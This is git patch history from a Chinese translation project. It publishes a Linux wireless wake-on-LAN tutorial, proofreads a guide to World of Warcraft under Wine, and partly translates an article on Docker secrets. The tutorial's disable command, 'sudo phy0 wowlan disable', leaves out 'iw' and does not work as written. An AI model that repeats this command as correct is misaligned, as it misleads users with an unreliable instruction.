--git a/published/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md b/published/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md deleted file mode 100644 index da7f1f55c0..0000000000 --- a/published/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md +++ /dev/null @@ -1,149 +0,0 @@ -如何为 Linux 无线网卡配置无线唤醒功能 -====== - -我有一台用于备份我的所有设备的网络存储(NAS)服务器。然而当我备份我的 Linux 笔记本时遇到了困难。当它休眠或挂起时我不能备份它。当我使用基于 Intel 的无线网卡时,我可以配置笔记本上的 WiFi 接受无线唤醒吗? - -[网络唤醒][2]Wake-on-LAN(WOL)是一个以太网标准,它允许服务器通过一个网络消息而被打开。你需要发送一个“魔法数据包”到支持网络唤醒的以太网卡和主板,以便打开被唤醒的系统。 - -[![linux-configire-wake-on-wireless-lan-wowlan][1]][1] - -无线唤醒wireless wake-on-lan(WoWLAN 或 WoW)允许 Linux 系统进入低耗电模式的情况下保持无线网卡处于激活状态,依然与热点连接。这篇教程演示了如何在一台安装无线网卡的 Linux 笔记本或桌面电脑上启用 WoWLAN / WoW 模式。 - -> 请注意,不是所有的无线网卡和 Linux 驱动程序都支持 WoWLAN。 - -### 语法 - -在 Linux 系统上,你需要使用 `iw` 命令来查看和操作无线设备及其配置。 其格式为: - -``` -iw command -iw [options] command -``` - -### 列出所有的无线设备及其功能 - -输入下面命令: - -``` -$ iw list -$ iw list | more -$ iw dev -``` - -输出为: - -``` -phy#0 - Interface wlp3s0 - ifindex 3 - wdev 0x1 - addr 6c:88:14:ff:36:d0 - type managed - channel 149 (5745 MHz),width: 40 MHz, center1: 5755 MHz - txpower 15.00 dBm -``` - -请记下这个 `phy0`。 - -### 查看无线唤醒的当前状态 - -打开终端并输入下面命令来查看无线网络的状态: - -``` -$ iw phy0 wowlan show -``` - -输出为: - -``` -WoWLAN is disabled -``` - -### 如何启用无线唤醒 - -启用的语法为: - -`sudo iw phy {phyname} wowlan enable {option}` - -其中, - -1. `{phyname}` - 使用 `iw dev` 来获取其物理名。 -2. `{option}` - 可以是 `any`、`disconnect`、`magic-packet` 等。 - -比如,我想为 `phy0` 开启无线唤醒: - -``` -$ sudo iw phy0 wowlan enable any -``` -或者: - -``` -$ sudo iw phy0 wowlan enable magic-packet disconnect -``` - -检查一下: - -``` -$ iw phy0 wowlan show -``` - -结果为: - -``` -WoWLAN is enabled: - * wake up on disconnect - * wake up on magic packet -``` - -### 测试一下 - -将你的笔记本挂起或者进入休眠模式: - -``` -$ sudo sh -c 'echo mem > /sys/power/state' -``` - -从 NAS 服务器上使用 [ping 命令][3] 发送 ping 请求 - -``` -$ ping your-laptop-ip -``` - -也可以 [使用 `wakeonlan` 命令发送魔法数据包][4]: - -``` -$ wakeonlan laptop-mac-address-here -$ etherwake MAC-Address-Here -``` - -### 如何禁用无线唤醒? - -语法为: - -``` -$ sudo phy {phyname} wowlan disable -$ sudo phy0 wowlan disable -``` - -更多信息请阅读 `iw` 命令的 man 页: - -``` -$ man iw -$ iw --help -``` - --------------------------------------------------------------------------------- - -via: https://www.cyberciti.biz/faq/configure-wireless-wake-on-lan-for-linux-wifi-wowlan-card/ - -作者:[Vivek Gite][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[wxy](https://github.com/wxy) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://twitter.com/nixcraft -[1]: https://www.cyberciti.biz/media/new/faq/2017/12/linux-configire-wake-on-wireless-lan-wowlan.jpg -[2]: https://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html -[3]: https://www.cyberciti.biz/faq/unix-ping-command-examples/ (See Linux/Unix ping command examples for more info) -[4]: https://www.cyberciti.biz/faq/apple-os-x-wake-on-lancommand-line-utility/ diff --git a/translated/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md b/translated/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md new file mode 100644 index 0000000000..a9b58edbd8 --- /dev/null +++ b/translated/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md @@ -0,0 +1,116 @@ +如何为 Linux 无线网卡配置无线唤醒功能 +====== +[![linux-configire-wake-on-wireless-lan-wowlan][1]][1] +无线唤醒 (WoWLAN or WoW) 允许 Linux 系统进入低耗电模式的情况下保持无线网卡处于激活状态依然与热点连接。这篇教程演示了如何在一台安装无线网卡的 Linux 笔记本或桌面电脑上启用 WoWLAN / WoW 模式。 + +请注意,不是所有的无线网卡和 Linux 驱动程序都支持 WoWLAN。 + +## 语法 + +在 Linux 系统上,你需要使用 iw 命令来查看和操作无线设备及其配置。 其 syntax 为: +``` +iw command +iw [options] command +``` + +## 列出所有的无线设备及其功能 + +输入下面命令: +``` +$ iw list +$ iw list | more +$ iw dev +``` +输出为: +``` +phy#0 + Interface wlp3s0 + ifindex 3 + wdev 0x1 + addr 6c:88:14:ff:36:d0 + type managed + channel 149 (5745 MHz),width: 40 MHz, center1: 5755 MHz + txpower 15.00 dBm + +``` + +请记下这个 phy0。 + +## 查看 wowlan 的当前状态 + +打开终端并输入下面命令来查看无线网络的状态: +``` +$ iw phy0 wowlan show +``` +输出为: +``` +WoWLAN is disabled +``` + +## 如何启用 wowlan + +启用的语法为: +`sudo iw phy {phyname} wowlan enable {option}` +其中, + + 1。{phyname} - 使用 iw dev 来获取 phy 的名字。 + 2。{option} - 可以是 any, disconnect, magic-packet 等。 + + + +比如,我想为 phy0 开启 wowlan: +`$ sudo iw phy0 wowlan enable any` +或者 +`$ sudo iw phy0 wowlan enable magic-packet disconnect` +检查一下: +`$ iw phy0 wowlan show` +结果为: +``` +WoWLAN is enabled: + * wake up on disconnect + * wake up on magic packet + +``` + +## 测试一下 + +将你的笔记本挂起或者进入休眠模式,然后从 NAS 服务器上发送 ping 请求或 magic packet: +`$ sudo sh -c 'echo mem > /sys/power/state'` +从 NAS 服务器上使用 [ping command][3] 发送 ping 请求 +`$ ping your-laptop-ip` +也可以 [使用 wakeonlan 命令发送 magic packet][4]: +``` +$ wakeonlan laptop-mac-address-here +$ etherwake MAC-Address-Here +``` + +## 如何禁用 WoWLAN? + +语法为: +``` +$ sudo phy {phyname} wowlan disable +$ sudo phy0 wowlan disable +``` + +更多信息请阅读 iw 命令的 man 页: +``` +$ man iw +$ iw --help +``` + + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/faq/configure-wireless-wake-on-lan-for-linux-wifi-wowlan-card/ + +作者:[Vivek Gite][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://twitter.com/nixcraft +[1] https://www.cyberciti.biz/media/new/faq/2017/12/linux-configire-wake-on-wireless-lan-wowlan.jpg +[2] https://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html +[3] //www.cyberciti.biz/faq/unix-ping-command-examples/ (See Linux/Unix ping command examples for more info) +[4] https://www.cyberciti.biz/faq/apple-os-x-wake-on-lancommand-line-utility/ From c17295f71569a470f549c3bfa57d11e4cc21de50 Mon Sep 17 00:00:00 2001 From: wxy Date: Sat, 16 Dec 2017 23:01:34 +0800 Subject: [PATCH 0637/1627] PRF&PUB:20171213 How to configure wireless wake-on-lan for Linux WiFi card.md @lujun9972 --- ...ireless wake-on-lan for Linux WiFi card.md | 149 ++++++++++++++++++ ...ireless wake-on-lan for Linux WiFi card.md | 116 -------------- 2 files changed, 149 insertions(+), 116 deletions(-) create mode 100644 published/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md delete mode 100644 translated/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md diff --git a/published/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md b/published/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md new file mode 100644 index 0000000000..da7f1f55c0 --- /dev/null +++ b/published/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md @@ -0,0 +1,149 @@ +如何为 Linux 无线网卡配置无线唤醒功能 +====== + +我有一台用于备份我的所有设备的网络存储(NAS)服务器。然而当我备份我的 Linux 笔记本时遇到了困难。当它休眠或挂起时我不能备份它。当我使用基于 Intel 的无线网卡时,我可以配置笔记本上的 WiFi 接受无线唤醒吗? + +[网络唤醒][2]Wake-on-LAN(WOL)是一个以太网标准,它允许服务器通过一个网络消息而被打开。你需要发送一个“魔法数据包”到支持网络唤醒的以太网卡和主板,以便打开被唤醒的系统。 + +[![linux-configire-wake-on-wireless-lan-wowlan][1]][1] + +无线唤醒wireless wake-on-lan(WoWLAN 或 WoW)允许 Linux 系统进入低耗电模式的情况下保持无线网卡处于激活状态,依然与热点连接。这篇教程演示了如何在一台安装无线网卡的 Linux 笔记本或桌面电脑上启用 WoWLAN / WoW 模式。 + +> 请注意,不是所有的无线网卡和 Linux 驱动程序都支持 WoWLAN。 + +### 语法 + +在 Linux 系统上,你需要使用 `iw` 命令来查看和操作无线设备及其配置。 其格式为: + +``` +iw command +iw [options] command +``` + +### 列出所有的无线设备及其功能 + +输入下面命令: + +``` +$ iw list +$ iw list | more +$ iw dev +``` + +输出为: + +``` +phy#0 + Interface wlp3s0 + ifindex 3 + wdev 0x1 + addr 6c:88:14:ff:36:d0 + type managed + channel 149 (5745 MHz),width: 40 MHz, center1: 5755 MHz + txpower 15.00 dBm +``` + +请记下这个 `phy0`。 + +### 查看无线唤醒的当前状态 + +打开终端并输入下面命令来查看无线网络的状态: + +``` +$ iw phy0 wowlan show +``` + +输出为: + +``` +WoWLAN is disabled +``` + +### 如何启用无线唤醒 + +启用的语法为: + +`sudo iw phy {phyname} wowlan enable {option}` + +其中, + +1. `{phyname}` - 使用 `iw dev` 来获取其物理名。 +2. `{option}` - 可以是 `any`、`disconnect`、`magic-packet` 等。 + +比如,我想为 `phy0` 开启无线唤醒: + +``` +$ sudo iw phy0 wowlan enable any +``` +或者: + +``` +$ sudo iw phy0 wowlan enable magic-packet disconnect +``` + +检查一下: + +``` +$ iw phy0 wowlan show +``` + +结果为: + +``` +WoWLAN is enabled: + * wake up on disconnect + * wake up on magic packet +``` + +### 测试一下 + +将你的笔记本挂起或者进入休眠模式: + +``` +$ sudo sh -c 'echo mem > /sys/power/state' +``` + +从 NAS 服务器上使用 [ping 命令][3] 发送 ping 请求 + +``` +$ ping your-laptop-ip +``` + +也可以 [使用 `wakeonlan` 命令发送魔法数据包][4]: + +``` +$ wakeonlan laptop-mac-address-here +$ etherwake MAC-Address-Here +``` + +### 如何禁用无线唤醒? + +语法为: + +``` +$ sudo phy {phyname} wowlan disable +$ sudo phy0 wowlan disable +``` + +更多信息请阅读 `iw` 命令的 man 页: + +``` +$ man iw +$ iw --help +``` + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/faq/configure-wireless-wake-on-lan-for-linux-wifi-wowlan-card/ + +作者:[Vivek Gite][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://twitter.com/nixcraft +[1]: https://www.cyberciti.biz/media/new/faq/2017/12/linux-configire-wake-on-wireless-lan-wowlan.jpg +[2]: https://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html +[3]: https://www.cyberciti.biz/faq/unix-ping-command-examples/ (See Linux/Unix ping command examples for more info) +[4]: https://www.cyberciti.biz/faq/apple-os-x-wake-on-lancommand-line-utility/ diff --git a/translated/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md b/translated/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md deleted file mode 100644 index a9b58edbd8..0000000000 --- a/translated/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md +++ /dev/null @@ -1,116 +0,0 @@ -如何为 Linux 无线网卡配置无线唤醒功能 -====== -[![linux-configire-wake-on-wireless-lan-wowlan][1]][1] -无线唤醒 (WoWLAN or WoW) 允许 Linux 系统进入低耗电模式的情况下保持无线网卡处于激活状态依然与热点连接。这篇教程演示了如何在一台安装无线网卡的 Linux 笔记本或桌面电脑上启用 WoWLAN / WoW 模式。 - -请注意,不是所有的无线网卡和 Linux 驱动程序都支持 WoWLAN。 - -## 语法 - -在 Linux 系统上,你需要使用 iw 命令来查看和操作无线设备及其配置。 其 syntax 为: -``` -iw command -iw [options] command -``` - -## 列出所有的无线设备及其功能 - -输入下面命令: -``` -$ iw list -$ iw list | more -$ iw dev -``` -输出为: -``` -phy#0 - Interface wlp3s0 - ifindex 3 - wdev 0x1 - addr 6c:88:14:ff:36:d0 - type managed - channel 149 (5745 MHz),width: 40 MHz, center1: 5755 MHz - txpower 15.00 dBm - -``` - -请记下这个 phy0。 - -## 查看 wowlan 的当前状态 - -打开终端并输入下面命令来查看无线网络的状态: -``` -$ iw phy0 wowlan show -``` -输出为: -``` -WoWLAN is disabled -``` - -## 如何启用 wowlan - -启用的语法为: -`sudo iw phy {phyname} wowlan enable {option}` -其中, - - 1。{phyname} - 使用 iw dev 来获取 phy 的名字。 - 2。{option} - 可以是 any, disconnect, magic-packet 等。 - - - -比如,我想为 phy0 开启 wowlan: -`$ sudo iw phy0 wowlan enable any` -或者 -`$ sudo iw phy0 wowlan enable magic-packet disconnect` -检查一下: -`$ iw phy0 wowlan show` -结果为: -``` -WoWLAN is enabled: - * wake up on disconnect - * wake up on magic packet - -``` - -## 测试一下 - -将你的笔记本挂起或者进入休眠模式,然后从 NAS 服务器上发送 ping 请求或 magic packet: -`$ sudo sh -c 'echo mem > /sys/power/state'` -从 NAS 服务器上使用 [ping command][3] 发送 ping 请求 -`$ ping your-laptop-ip` -也可以 [使用 wakeonlan 命令发送 magic packet][4]: -``` -$ wakeonlan laptop-mac-address-here -$ etherwake MAC-Address-Here -``` - -## 如何禁用 WoWLAN? - -语法为: -``` -$ sudo phy {phyname} wowlan disable -$ sudo phy0 wowlan disable -``` - -更多信息请阅读 iw 命令的 man 页: -``` -$ man iw -$ iw --help -``` - - --------------------------------------------------------------------------------- - -via: https://www.cyberciti.biz/faq/configure-wireless-wake-on-lan-for-linux-wifi-wowlan-card/ - -作者:[Vivek Gite][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://twitter.com/nixcraft -[1] https://www.cyberciti.biz/media/new/faq/2017/12/linux-configire-wake-on-wireless-lan-wowlan.jpg -[2] https://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html -[3] //www.cyberciti.biz/faq/unix-ping-command-examples/ (See Linux/Unix ping command examples for more info) -[4] https://www.cyberciti.biz/faq/apple-os-x-wake-on-lancommand-line-utility/ From 9173577dfcfda5c57922d637972df77d26bea07f Mon Sep 17 00:00:00 2001 From: wxy Date: Sat, 16 Dec 2017 23:37:46 +0800 Subject: [PATCH 0638/1627] PRF&PUB:20170928 How to Play World of Warcraft On Linux With Wine.md @lujun9972 --- ...ay World of Warcraft On Linux With Wine.md | 51 +++++++++---------- 1 file changed, 23 insertions(+), 28 deletions(-) rename {translated/tech => published}/20170928 How to Play World of Warcraft On Linux With Wine.md (59%) diff --git a/translated/tech/20170928 How to Play World of Warcraft On Linux With Wine.md b/published/20170928 How to Play World of Warcraft On Linux With Wine.md similarity index 59% rename from translated/tech/20170928 How to Play World of Warcraft On Linux With Wine.md rename to published/20170928 How to Play World of Warcraft On Linux With Wine.md index 9831674979..172a2b56c4 100644 --- a/translated/tech/20170928 How to Play World of Warcraft On Linux With Wine.md +++ b/published/20170928 How to Play World of Warcraft On Linux With Wine.md @@ -1,97 +1,92 @@ 如何使用 Wine 在 Linux 下玩魔兽世界 ====== -### 目标 +**目标:**在 Linux 中运行魔兽世界 -在 Linux 中运行魔兽世界 +**发行版:**适用于几乎所有的 Linux 发行版。 -### 发行版 +**要求:**具有 root 权限的 Linux 系统,搭配上比较现代化的显卡并安装了最新的图形驱动程序。 -适用于几乎所有的 Linux 发行版。 +**难度:**简单 -### 要求 +**约定:** -具有 root 权限的 linux 系统,搭配上比较现代化的显卡并安装了最新的图形驱动程序。 - -### 难度 - -简单 - -### 约定 - - * # - 要求以 root 权限执行命令,可以直接用 root 用户来执行也可以使用 `sudo` 命令 - * $ - 使用普通非特权用户执行 +* `#` - 要求以 root 权限执行命令,可以直接用 root 用户来执行也可以使用 `sudo` 命令 +* `$` - 使用普通非特权用户执行 ### 简介 -魔兽世界已经出现差不多有 13 年了,但它依然是最流行的 MMORPG。 不幸的是, 这段时间以来暴雪从来没有发不过一个官方的 Linux 客户端。 不过还好,我们有 Wine。 +魔兽世界已经出现差不多有 13 年了,但它依然是最流行的 MMORPG。 不幸的是, 一直以来暴雪从未发布过官方的 Linux 客户端。 不过还好,我们有 Wine。 ### 安装 Wine 你可以试着用一下普通的 Wine,但它在游戏性能方面改进不大。 Wine Staging 以及带 Gallium Nine 补丁的 Wine 几乎在各方面都要更好一点。 如果你使用了闭源的驱动程序, 那么 Wine Staging 是最好的选择。 若使用了 Mesa 驱动程序, 则还需要打上 Gallium Nine 补丁。 -根据你使用的发行版,参考 [Wine install guide][6] 来安装。 +根据你使用的发行版,参考 [Wine 安装指南][6] 来安装。 ### Winecfg -打开 `winecfg`。确保第一个标签页中的 Windows 版本已经设置成了 `Windows 7`。 暴雪不再对之前的版本提供支持。 然后进入 "Staging" 标签页。 这里根据你用的是 staging 版本的 Wine 还是 打了 Gallium 补丁的 Wine 来进行选择。 +打开 `winecfg`。确保第一个标签页中的 Windows 版本已经设置成了 `Windows 7`。 暴雪不再对之前的版本提供支持。 然后进入 “Staging” 标签页。 这里根据你用的是 staging 版本的 Wine 还是打了 Gallium 补丁的 Wine 来进行选择。 ![Winecfg Staging Settings][1] + 不管是哪个版本的 Wine,都需要启用 VAAPI 以及 EAX。 至于是否隐藏 Wine 的版本则由你自己决定。 如果你用的是 Staging 补丁,则启用 CSMT。 如果你用的是 Gallium Nine,则启用 Gallium Nine。 但是你不能两个同时启用。 ### Winetricks -下一步轮到 Winetricks 了。如果你对它不熟,那我告诉你, Winetricks 一个用来为 Wine 安装各种 Windows 库以及组件以便程序正常运行的脚本。 更多信息可以阅读我们的这篇文章[Winetricks guide][7]: +下一步轮到 Winetricks 了。如果你对它不了解,那我告诉你, Winetricks 一个用来为 Wine 安装各种 Windows 库以及组件以便程序正常运行的脚本。 更多信息可以阅读我们的这篇文章 [Winetricks 指南][7]: ![Winetricks Corefonts Installed][2] -要让 WoW 以及战网启动程序(Battle.net launcher)工作需要安装一些东西。首先,在 “Fonts” 部分中安装 `corefonts`。 然后下面这一步是可选的, 如果你希望在战网启动程序中现实所有互联网上的数据的话,就还需要安装 DLL 部分中的 `ie8`。 +要让 WoW 以及战网启动程序Battle.net launcher工作需要安装一些东西。首先,在 “Fonts” 部分中安装 `corefonts`。 然后下面这一步是可选的, 如果你希望来自互联网上的所有数据都显示在战网启动程序中的话,就还需要安装 DLL 部分中的 ie8。 ### Battle.net 现在你配置好了 Wine 了,可以安装 Battle.net 应用了。 Battle.net 应用用来安装和升级 WoW 以及其他暴雪游戏。 它经常在升级后会出现问题。 因此若它突然出现问题,请查看 [WineHQ 页面][8]。 -毫无疑问,你可以从 [Blizzard 的官网上][9] 下载 Battle.net 应用 +毫无疑问,你可以从 [Blizzard 的官网上][9] 下载 Battle.net 应用。 下载完毕后,使用 Wine 打开 `.exe` 文件, 然后按照安装指引一步步走下去,就跟在 Windows 上一样。 ![Battle.net Launcher With WoW Installed][3] -应用安装完成后,登陆/新建帐号就会进入启动器界面。 你在那可以安装和管理游戏。 然后开始安装 WoW。 这可得好一会儿。 + +应用安装完成后,登录/新建帐号就会进入启动器界面。 你在那可以安装和管理游戏。 然后开始安装 WoW。 这可得好一会儿。 ### 运行游戏 ![WoW Advanced Settings][4] -在 Battle.net 应用中点击 “Play” 按钮就能启动 WoW 了。你需要等一会儿才能出现登陆界面, 这个性能简直堪称垃圾。 之所以这么慢是因为 WoW 默认使用 DX11 来加速。 进入设置窗口中的“Advanced”标签页, 设置图像 API 为 DX9。 保存然后退出游戏。 退出成功后再重新打开游戏。 + +在 Battle.net 应用中点击 “Play” 按钮就能启动 WoW 了。你需要等一会儿才能出现登录界面, 这个性能简直堪称垃圾。 之所以这么慢是因为 WoW 默认使用 DX11 来加速。 进入设置窗口中的 “Advanced” 标签页, 设置图像 API 为 DX9。 保存然后退出游戏。 退出成功后再重新打开游戏。 现在游戏应该可以玩了。请注意,游戏的性能严重依赖于你的硬件水平。 WoW 是一个很消耗 CPU 的游戏, 而 Wine 更加加剧了 CPU 的负担。 如果你的 CPU 不够强劲, 你的体验会很差。 不过 WoW 支持低特效,因此你可以调低画质让游戏更流畅。 #### 性能调优 ![WoW Graphics Settings][5] + 很难说什么样的设置最适合你。WoW 在基本设置中有一个很简单的滑动比例条。 它的配置应该要比在 Windows 上低几个等级,毕竟这里的性能不像 Windows 上那么好。 -先调低最可能的罪魁祸首。像抗锯齿和粒子就常常会导致低性能。 另外,试试对比一下窗口模式和全屏模式。 有时候这两者之间的差距还是蛮大的。 +先调低最可能的罪魁祸首。像抗锯齿anti-aliasing粒子particles就常常会导致低性能。 另外,试试对比一下窗口模式和全屏模式。 有时候这两者之间的差距还是蛮大的。 -WoW 对 raid 以及 battleground 有专门的配置项。raid 以及 battleground 实例中的内容需要更精细的画面。 有时间 WoW 在开放地图中表现不错, 但当很多玩家出现在屏幕中时就变得很垃圾了。 +WoW 对 “Raid and Battleground” 有专门的配置项。这可以在 “Raid and Battleground” 实例中的内容创建更精细的画面。 有时间 WoW 在开放地图中表现不错, 但当很多玩家出现在屏幕中时就变得很垃圾了。 实验然后看看哪些配置最适合你的系统。这完全取决于你的硬件和你的系统配置。 ### 最后结语 -从未发不过 Linux 版的魔兽世界,但它在 Wine 上已经运行很多年了。 事实上, 它几乎一直都工作的很好。 甚至有传言说暴雪的开发人员会在 Wine 上测试以保证它是有效的。。 +虽然从未发布过 Linux 版的魔兽世界,但它在 Wine 上已经运行很多年了。 事实上, 它几乎一直都工作的很好。 甚至有传言说暴雪的开发人员会在 Wine 上测试以保证它是有效的。 虽然有这个说法,但后续的更新和补丁还是会影响到这个古老的游戏, 所以请随时做好出问题的准备。 不管怎样, 就算出问题了,也总是早已有了解决方案, 你只需要找到它而已。 - -------------------------------------------------------------------------------- via: https://linuxconfig.org/how-to-play-world-of-warcraft-on-linux-with-wine 作者:[Nick Congleton][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 4c24bc0c512326ec169538e24c14e0ba570d0790 Mon Sep 17 00:00:00 2001 From: Chang Liu Date: Sun, 17 Dec 2017 00:29:29 +0800 Subject: [PATCH 0639/1627] Update 20171119 10 Best LaTeX Editors For Linux.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 准备翻译本文。 --- sources/tech/20171119 10 Best LaTeX Editors For Linux.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171119 10 Best LaTeX Editors For Linux.md b/sources/tech/20171119 10 Best LaTeX Editors For Linux.md index 467257a68d..19245889e3 100644 --- a/sources/tech/20171119 10 Best LaTeX Editors For Linux.md +++ b/sources/tech/20171119 10 Best LaTeX Editors For Linux.md @@ -1,3 +1,5 @@ +FSSlc Translating + 10 Best LaTeX Editors For Linux ====== **Brief: Once you get over the learning curve, there is nothing like LaTex. From f5260baf3cccdfdc6c6a52b53586518f47a74caa Mon Sep 17 00:00:00 2001 From: TRsky <625310581@qq.com> Date: Sun, 17 Dec 2017 04:39:49 +0800 Subject: [PATCH 0640/1627] mcomplete the translation --- ...9 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 41 ++++++++++--------- 1 file changed, 22 insertions(+), 19 deletions(-) diff --git a/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md index a3fc2c886e..6fa5eb4bcd 100644 --- a/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md +++ b/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md @@ -1,35 +1,38 @@ -INTRODUCING DOCKER SECRETS MANAGEMENT -============================================================ -Containers are changing how we view apps and infrastructure. Whether the code inside containers is big or small, container architecture introduces a change to how that code behaves with hardware – it fundamentally abstracts it from the infrastructure. Docker believes that there are three key components to container security and together they result in inherently safer apps. +Dockers Secrets 管理介绍 +========================= + +容器正在改变我们对应用程序和基础设施的看法。无论容器内的代码量是大还是小,容器架构引入了一种代码与硬件起作用方式的变化 – 它从根本上将其从基础设施中抽象出来。对于容器安全来说,Docker这里有三个关键部分。且他们共同引起了本质上更安全的应用程序。 ![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1) + +构建更安全的应用程序的一个关键因素是与其他应用程序和系统进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证--通常称为应用程序 secret。我们很高兴介绍Docker Sercets,Docker Secrets 是容器的本土解决方案,是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成 secret 分配功能。 -A critical element of building safer apps is having a secure way of communicating with other apps and systems, something that often requires credentials, tokens, passwords and other types of confidential information—usually referred to as application secrets. We are excited to introduce Docker Secrets, a container native solution that strengthens the Trusted Delivery component of container security by integrating secret distribution directly into the container platform. +有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的 secret 分布解决方案略显不足,因为他们都是针对静态环境。不幸的是,这导致了应用程序secrets不善管理的增加,使其总是找到安全的,本土的解决方案,比如像GitHub嵌入secrets到版本控制系统,或着同样糟糕是像马后炮一样的定点解决。 -With containers, applications are now dynamic and portable across multiple environments. This  made existing secrets distribution solutions inadequate because they were largely designed for static environments. Unfortunately, this led to an increase in mismanagement of application secrets, making it common to find insecure, home-grown solutions, such as embedding secrets into version control systems like GitHub, or other equally bad—bolted on point solutions as an afterthought. +### Docker Secerts 管理介绍 -### Introducing Docker Secrets Management +根本上我们认为,如果有一个标准的接口来访问secrets,应用程序就更安全了。任何好的解决方案也必须遵循安全性实践,例如在传输的过程中,对secrets进行加密;在休息的时候对secrets进行加密;防止无意中泄露最终应用所消耗的secrets;并严格遵守最小特权原则即应用程序只能访问所需的secrets,不能多也不能不少。通过将secrets整合向docker的业务流程,我们能够在遵循这些确切的原则下为secrets管理问题提供一种解决方案。 -We fundamentally believe that apps are safer if there is a standardized interface for accessing secrets. Any good solution will also have to follow security best practices, such as encrypting secrets while in transit; encrypting secrets at rest; preventing secrets from unintentionally leaking when consumed by the final application; and strictly adhere to the principle of least-privilege, where an application only has access to the secrets that it needs—no more, no less. +下图提供了一个高层次视图,并展示了Docker swarm mode结构是如何将一种新类型的对象安全地传递给我们的容器:一个secret对象。 -By integrating secrets into Docker orchestration, we are able to deliver a solution for the secrets management problem that follows these exact principles. +![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1) -The following diagram provides a high-level view of how the Docker swarm mode architecture is applied to securely deliver a new type of object to our containers: a secret object. - - ![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1) - -In Docker, a secret is any blob of data, such as a password, SSH private key, TLS Certificate, or any other piece of data that is sensitive in nature. When you add a secret to the swarm (by running `docker secret create`), Docker sends the secret over to the swarm manager over a mutually authenticated TLS connection, making use of the [built-in Certificate Authority][17] that gets automatically created when bootstrapping a new swarm. + +在Docker中,一个secret是任意的数据块,比如密码、SSH 密钥、TLS凭证,或者对自然界敏感的每一块数据。当你将一个secret加入swarm(通过执行`docker secret create`)时,docker利用在引导一个新的swarm时自动创建的内置的证书权威,通过相互认证的TLS连接把secret交给swarm管理。 ``` $ echo "This is a secret" | docker secret create my_secret_data - ``` -Once the secret reaches a manager node, it gets saved to the internal Raft store, which uses NACL’s Salsa20Poly1305 with a 256-bit key to ensure no data is ever written to disk unencrypted. Writing to the internal store gives secrets the same high availability guarantees that the the rest of the swarm management data gets. +一旦,secret 达到一个管理节点,它就会被保存在采用NaCl的salsa20poly1305与一个256位的密钥来确保没有任何数据写入磁盘加密的 Raft store 中。 向内部存储写入secrets,保证了数据管理的大量获取。 -When a swarm manager starts up, the encrypted Raft logs containing the secrets is decrypted using a data encryption key that is unique per-node. This key, and the node’s TLS credentials used to communicate with the rest of the cluster, can be encrypted with a cluster-wide key encryption key, called the unlock key, which is also propagated using Raft and will be required on manager start. +当 swarm 管理器启动的时,包含secrets的被加密过的Raft日志通过每一个节点唯一的数据密钥进行解密。此密钥和用于与集群其余部分通信的节点的TLS凭据可以使用一个集群范围的密钥加密密钥进行加密,该密钥称为“解锁密钥”,还使用Raft进行传播,将且会在管理器启动的时候被要求。 -When you grant a newly-created or running service access to a secret, one of the manager nodes (only managers have access to all the stored secrets stored) will send it over the already established TLS connection exclusively to the nodes that will be running that specific service. This means that nodes cannot request the secrets themselves, and will only gain access to the secrets when provided to them by a manager – strictly for the services that require them. 